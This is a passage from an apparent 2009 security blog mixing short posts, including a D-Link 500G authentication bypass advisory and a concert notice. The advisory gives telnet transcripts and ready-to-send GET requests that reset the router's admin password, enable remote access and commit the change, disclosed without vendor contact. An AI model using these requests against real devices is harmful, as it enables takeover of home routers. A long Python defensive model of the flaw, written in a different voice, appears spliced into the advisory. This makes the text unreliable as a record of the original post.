Xanda's Blog !~!

ClientMe v0.01 Alpha – Preview

Aug 25

Don’t get me wrong.. It is not ready yet.. This is just the preview for one of the components

Research shows that 80% of Web users running unpatched versions of Flash/Acrobat

Aug 25

According to research published by Trusteer earlier this month, 79.5% of the 2.5 million users of their Rapport security service run a vulnerable version of Adobe Flash, and 83.5% also run a vulnerable version of Acrobat.

The company also criticized Adobe, saying its update mechanism “does not meet the requirements of a system that is used by 99% of users on the Internet and is highly targeted by criminals”, while praising the update mechanisms of Google’s Chrome and Firefox, whose silent updates close the window of opportunity that attackers would otherwise exploit.

[Read more HERE]

Flash Attack Vectors – Cross Site Flashing (XSF)

Aug 25

A few days ago a lot of media wrote about a Flash worm. I managed to get hold of samples and analyzed it (thanks to Peter Kruse of CSIS for the samples).

First of all, while the exploit code contains Flash, it is actually just used as an attack (or, if we stretch it, infection) vector. The worm itself is contained in JavaScript and is very similar to the Twitter worm I analyzed back in April this year (see http://isc.sans.org/diary.html?storyid=6187). That is not surprising as both worms are attacking similar services.

The worm was first identified on a popular Chinese social web site (for schools, if I’m not wrong), Renren (http://www.renren.com). This site is in many ways similar to Twitter or Facebook, but much more media intensive and it allows users to share various information, including pictures, movies etc.

[Read more HERE]

D-LINK 500G Authentication Bypass

Aug 24

SUMMARY
There is an authentication bypass vulnerability in D-Link 500G that allows an attacker to take full control over the device. Remote access is disabled by default, so the attacker is required to be on the local network.
The bypass can be triggered by sending an HTTP request without the HOST header.

$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Host: 192.168.0.1
Connection: close
 
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic Realm="DSL-500G"
Content-type: text/html
Content-length: 111
 
<html><head><title>401 Unauthorized Access</title></head><body><h1>401
Unauthorized Access</h1></body></html>
Connection closed by foreign host.
$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET / HTTP/1.1
Connection: close
 
HTTP/1.1 302 Document Follows
Location: /hag/pages/home.ssi
 
Connection closed by foreign host.
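The transcript above shows the device challenging a request that carries a Host header and silently redirecting one that omits it. As an added illustration (not code from the advisory or from the D-Link firmware, whose actual logic is not known from this write-up), the Python below models one way a bypass of this shape arises, next to a handler that decides authentication before routing so no header can steer a request around the check. The realm string and redirect target are taken from the transcript; the credentials and request bytes are constructed, and `vulnerable_handler`, `hardened_handler`, `credentials_ok` and `demo` are hypothetical names.

```python
import base64
import hmac

# Constructed values, modelled on the transcript: the realm and redirect target
# are the ones the device returns; the credentials are placeholders.
REALM = "DSL-500G"
VALID_USER = "admin"
VALID_PASS = "admin"
HOME_PAGE = "/hag/pages/home.ssi"


def parse_request(raw):
    """Parse the head of an HTTP/1.x request into (method, path, version, headers).
    Header names are lower-cased because HTTP header names are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def credentials_ok(headers):
    """Validate an HTTP Basic Authorization header against the constructed credentials."""
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return False
    try:
        decoded = base64.b64decode(token.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    user, _, password = decoded.partition(b":")
    # Constant-time comparison on bytes; avoids early-exit timing differences.
    return (hmac.compare_digest(user, VALID_USER.encode())
            and hmac.compare_digest(password, VALID_PASS.encode()))


def unauthorized():
    return 401, {"WWW-Authenticate": 'Basic Realm="%s"' % REALM}


def vulnerable_handler(raw):
    """Hypothetical flawed dispatch (not the real firmware logic): the auth check
    lives inside the branch selected by the Host header, so a request that omits
    Host takes the default route and is redirected to the home page without ever
    being challenged. This reproduces the 401/302 pair seen in the transcript."""
    _method, _path, _version, headers = parse_request(raw)
    if "host" in headers:
        if not credentials_ok(headers):
            return unauthorized()
        return 200, {}
    return 302, {"Location": HOME_PAGE}  # default route: no auth check at all


def hardened_handler(raw):
    """Authentication is decided once, before routing, from the credentials alone;
    which route later handles the request cannot change the outcome. An HTTP/1.1
    request without Host is malformed and is rejected rather than given a default."""
    _method, _path, version, headers = parse_request(raw)
    if not credentials_ok(headers):
        return unauthorized()
    if version == "HTTP/1.1" and "host" not in headers:
        return 400, {}
    return 200, {}


def basic_auth(user, password):
    """Build a Basic Authorization header value for the constructed requests."""
    return "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()


def demo():
    """Run both handlers over constructed requests mirroring the transcript.
    Returns {case: (vulnerable_status, hardened_status)}."""
    good = basic_auth(VALID_USER, VALID_PASS)
    bad = basic_auth(VALID_USER, "wrong")
    cases = {
        "host_no_auth": b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\nConnection: close\r\n\r\n",
        "no_host_no_auth": b"GET / HTTP/1.1\r\nConnection: close\r\n\r\n",
        "host_good_auth": ("GET / HTTP/1.1\r\nHost: 192.168.0.1\r\nAuthorization: %s\r\n\r\n" % good).encode(),
        "host_bad_auth": ("GET / HTTP/1.1\r\nHost: 192.168.0.1\r\nAuthorization: %s\r\n\r\n" % bad).encode(),
        "no_host_good_auth_http11": ("GET / HTTP/1.1\r\nAuthorization: %s\r\n\r\n" % good).encode(),
        "no_host_good_auth_http10": ("GET / HTTP/1.0\r\nAuthorization: %s\r\n\r\n" % good).encode(),
    }
    return {name: (vulnerable_handler(req)[0], hardened_handler(req)[0])
            for name, req in cases.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print("%-26s vulnerable=%d hardened=%d" % (name, vuln, hard))
```

The defensive point is the ordering: the access decision is made from the credentials before any routing happens, so an optional or client-controlled header such as Host can only select which page is served, never whether the client is challenged. Treating an HTTP/1.1 request that lacks Host as malformed (400) instead of routing it to a default vhost removes the second half of the problem.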

AFFECTED PRODUCTS
Confirmed in D-Link 500G Firmware R2.01.B9.EU(030917a/T93.3.44).
Haven’t tested on other devices and versions.

SOLUTION
The manufacturer has not been contacted. Don’t complain to me.

EXPLOIT

Reset the admin password:
GET /Action?cmdSubmit=Submit&ex_param1=admin&id=3&new_pass1=admin&new_pass2=admin&old_pass=admin&user=admin HTTP/1.0

Enable remote access:
GET /Action?cmdSubmit=Submit&remote=0&id=83 HTTP/1.0

Commit changes:
GET /Action?cmdCommit=Commit&reboot_loc=0&id=4 HTTP/1.0

CREDITS
Discovered by Jardel Weyrich <jweyrich at gmail dot com>.

No Use For A Name Live in KL

Aug 24

Just wanna share for those who still don’t know

Date: 10/18/2009
Time: 8:00 PM
Venue: Ruums Club, Kuala Lumpur

See you there 😉

[updated on 25th August 2009 at 11:26PM]

Date: 18th October 2009 (Sunday)
Venue: KL Live (formerly Ruums Club), Kuala Lumpur, Malaysia
Time: 1pm onwards

Support bands: Under 18, Abhorrence, Dosound, Plague of Happiness, Toxitoy, Second Combat, Always Last

Tickets: RM65 (early bird registration), RM75 (door)

On sale at: ALLUNAN SYMFONNY studio cafe & distro (wholly owned by PERMATHA PATHAH PRODUCTION)
#27-2, Jalan PJS 8/12
Dataran Sunway Mentari
46150 Petaling Jaya
Selangor Darul Ehsan,
Malaysia

Hotlines: 016 624 2916, 019 229 3816, 012 669 0243, 018 246 1976, +06591021518 (Singapore)

More info: http://nervhousrecords.blogspot.com/